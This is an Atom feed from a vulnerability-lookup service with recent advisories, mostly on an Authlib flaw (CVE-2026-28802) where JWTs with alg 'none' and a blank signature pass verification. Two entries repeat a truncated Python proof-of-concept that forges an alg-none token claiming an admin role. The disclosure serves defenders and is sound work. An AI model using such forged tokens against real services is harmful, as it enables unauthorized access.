<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-02T14:54:02.358417+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/bdu:2026-04355</id>
    <title>bdu:2026-04355</title>
    <updated>2026-10-02T14:54:02.386500+00:00</updated>
    <content>bdu:2026-04355</content>
    <link href="https://cve.radiocsirt.org/vuln/bdu:2026-04355"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/brew-fastmcp-cve-2026-28802</id>
    <title>BREW-fastmcp-CVE-2026-28802 — Authlib: Setting `alg: none` and a blank signature appears to bypass signature verification</title>
    <updated>2026-10-02T14:54:02.386548+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> Homebrew: fastmcp</p>
<p>### Summary
After upgrading the library from 1.5.2 to 1.6.0 (and the latest 1.6.5) it was noticed that previous tests involving passing a malicious JWT containing alg: none and an empty signature was passing the signature verification step without any changes to the application code when a failure was expected.</p>
<p>### Details
It was likely introduced in this commit:
https://github.com/authlib/authlib/commit/a61c2acb807496e67f32051b5f1b1d5ccf8f0a75</p>
<p>### PoC
```
from authlib.jose import jwt, JsonWebKey
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.backends import default_backend
import json
import base64</p>
<p>def create_jwks():
    private_key = rsa.generate_private_key(
        public_exponent=65537, key_size=2048, backend=default_backend()
    )
    public_pem = private_key.public_key().public_bytes(
        encoding=serialization.Encoding.PEM,
        format=serialization.PublicFormat.SubjectPublicKeyInfo,
    )
    jwk = JsonWebKey.import_key(public_pem).as_dict()
    jwk["kid"] = "test-key-001"
    jwk["use"] = "sig"
    jwk["alg"] = "RS256"
    jwks = {"keys": [jwk]}
    return jwks</p>
<p>def create_forged_token_with_alg_none():
    forged_header = {"alg": "none"}
    forged_payload = {
        "sub": "user123",
        "role": "admin",
        "iat": 1735603200,
    }</p>
<p>header_b64 = base64.urlsafe_b64encode(
        json.dumps(forged_header).encode("utf-8")
    ).rstrip(b"=")</p>
<p>p…</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/brew-fastmcp-cve-2026-28802"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/euvd-2026-366113</id>
    <title>EUVD-2026-366113</title>
    <updated>2026-10-02T14:54:02.386610+00:00</updated>
    <content>EUVD-2026-366113</content>
    <link href="https://cve.radiocsirt.org/vuln/euvd-2026-366113"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/fkie_cve-2026-28802</id>
    <title>fkie_cve-2026-28802</title>
    <updated>2026-10-02T14:54:02.386625+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>Authlib is a Python library which builds OAuth and OpenID Connect servers. From version 1.6.5 to before version 1.6.7, previous tests involving passing a malicious JWT containing alg: none and an empty signature was passing the signature verification step without any changes to the application code when a failure was expected.. This issue has been patched in version 1.6.7.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/fkie_cve-2026-28802"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-7wc2-qxgw-g8gg</id>
    <title>GHSA-7wc2-qxgw-g8gg — Authlib: Setting `alg: none` and a blank signature appears to bypass signature verification</title>
    <updated>2026-10-02T14:54:02.386649+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> PyPI: authlib</p>
<p>### Summary
After upgrading the library from 1.5.2 to 1.6.0 (and the latest 1.6.5) it was noticed that previous tests involving passing a malicious JWT containing alg: none and an empty signature was passing the signature verification step without any changes to the application code when a failure was expected.</p>
<p>### Details
It was likely introduced in this commit:
https://github.com/authlib/authlib/commit/a61c2acb807496e67f32051b5f1b1d5ccf8f0a75</p>
<p>### PoC
```
from authlib.jose import jwt, JsonWebKey
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.backends import default_backend
import json
import base64</p>
<p>def create_jwks():
    private_key = rsa.generate_private_key(
        public_exponent=65537, key_size=2048, backend=default_backend()
    )
    public_pem = private_key.public_key().public_bytes(
        encoding=serialization.Encoding.PEM,
        format=serialization.PublicFormat.SubjectPublicKeyInfo,
    )
    jwk = JsonWebKey.import_key(public_pem).as_dict()
    jwk["kid"] = "test-key-001"
    jwk["use"] = "sig"
    jwk["alg"] = "RS256"
    jwks = {"keys": [jwk]}
    return jwks</p>
<p>def create_forged_token_with_alg_none():
    forged_header = {"alg": "none"}
    forged_payload = {
        "sub": "user123",
        "role": "admin",
        "iat": 1735603200,
    }</p>
<p>header_b64 = base64.urlsafe_b64encode(
        json.dumps(forged_header).encode("utf-8")
    ).rstrip(b"=")</p>
<p>p…</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-7wc2-qxgw-g8gg"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/pysec-2026-2118</id>
    <title>PYSEC-2026-2118</title>
    <updated>2026-10-02T14:54:02.386693+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> PyPI: authlib</p>
<p>Authlib is a Python library which builds OAuth and OpenID Connect servers. From version 1.6.5 to before version 1.6.7, previous tests involving passing a malicious JWT containing alg: none and an empty signature was passing the signature verification step without any changes to the application code when a failure was expected.. This issue has been patched in version 1.6.7.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/pysec-2026-2118"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/rhsa-2026:19375</id>
    <title>RHSA-2026:19375 — Red Hat Security Advisory: Red Hat Quay 3.16.4</title>
    <updated>2026-10-02T14:54:02.386714+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>golang: net/url: Memory exhaustion in query parameter parsing in net/url axios: Axios: Server-Side Request Forgery and proxy bypass due to improper hostname normalization mirror-registry: quay: quay: Server-Side Request Forgery via log export functionality jsrsasign: jsrsasign: Denial of Service via infinite loop in bnModInverse function with crafted inputs jsrsasign: jsrsasign: Private key recovery via incomplete comparison checks biasing DSA nonces jsrsasign: jsrsasign: Cryptographic signature forgery via malicious DSA domain parameters jsrsasign: jsrsasign: Private Key Recovery via Missing Cryptographic Step in DSA Signing jsrsasign: jsrsasign: Signature verification bypass via negative exponent handling net/url: Incorrect parsing of IPv6 host literals in net/url crypto/x509: Incorrect enforcement of email constraints in crypto/x509 pyOpenSSL: DTLS cookie callback buffer overflow authlib: Authlib: Authentication bypass due to JWK Header Injection vulnerability authlib: Authlib: Signature verification bypass via malicious JWT allows unauthorized access immutable-js: Immutable.js: Arbitrary code execution via Prototype Pollution svgo: SVGO: Denial of Service via XML entity expansion pyasn1: pyasn1 Vulnerable to Denial of Service via Unbounded Recursion crypto/x509: crypto/tls: golang: Go: Denial of Service vulnerability in certificate chain building golang: internal/syscall/unix: Root.Chmod can follow symlinks out of the root github.com/jackc/pgproto3/v2: github.com/jackc/p…</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/rhsa-2026:19375"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ubuntu-cve-2026-28802</id>
    <title>UBUNTU-CVE-2026-28802</title>
    <updated>2026-10-02T14:54:02.386796+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> Ubuntu:25.10: python-authlib</p>
<p>Authlib is a Python library which builds OAuth and OpenID Connect servers. From version 1.6.5 to before version 1.6.7, previous tests involving passing a malicious JWT containing alg: none and an empty signature was passing the signature verification step without any changes to the application code when a failure was expected.. This issue has been patched in version 1.6.7.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ubuntu-cve-2026-28802"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/wid-sec-w-2026-0935</id>
    <title>WID-SEC-W-2026-0935 — Red Hat Ansible Automation Platform: Mehrere Schwachstellen</title>
    <updated>2026-10-02T14:54:02.386816+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in Red Hat Ansible Automation Platform ausnutzen, um einen Denial of Service Angriff durchzuführen, beliebigen Code auszuführen, Sicherheitsmaßnahmen zu umgehen, Daten zu manipulieren, vertrauliche Informationen offenzulegen oder Cross-Site-Scripting-Angriffe durchzuführen.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/wid-sec-w-2026-0935"/>
  </entry>
</feed>
